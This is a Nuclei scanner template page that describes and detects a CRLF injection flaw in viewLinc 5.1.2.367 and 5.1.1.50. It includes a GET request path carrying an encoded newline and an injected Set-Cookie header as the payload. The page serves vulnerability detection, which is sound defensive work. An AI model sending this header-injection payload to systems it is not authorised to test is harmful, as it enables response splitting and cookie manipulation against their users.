viewLinc 5.1.2.367 - Carriage Return Line Feed Attack
ID: viewlinc-crlf-injection
Severity: low
Author: geeknik
Tags: crlf,viewlinc
Description
Section titled “Description”viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned.
YAML Source
Section titled “YAML Source”id: viewlinc-crlf-injection
info: name: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack author: geeknik severity: low description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned. reference: - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system metadata: max-request: 1 tags: crlf,viewlinc
http: - method: GET path: - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
matchers-condition: or matchers: - type: word words: - "Server: viewLinc/5.1.2.367" - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and
- type: word words: - "Server: viewLinc/5.1.1.50" - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and# digest: 4a0a00473045022075ff4b68578e6e09db4886aff467cf324c2ba5842ce5f0224d413653765181b1022100a1830d6b6886cc6c4abc8684f46b82247a34b08237c7fb62de9f8f3c4ab1619e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/viewlinc-crlf-injection.yaml"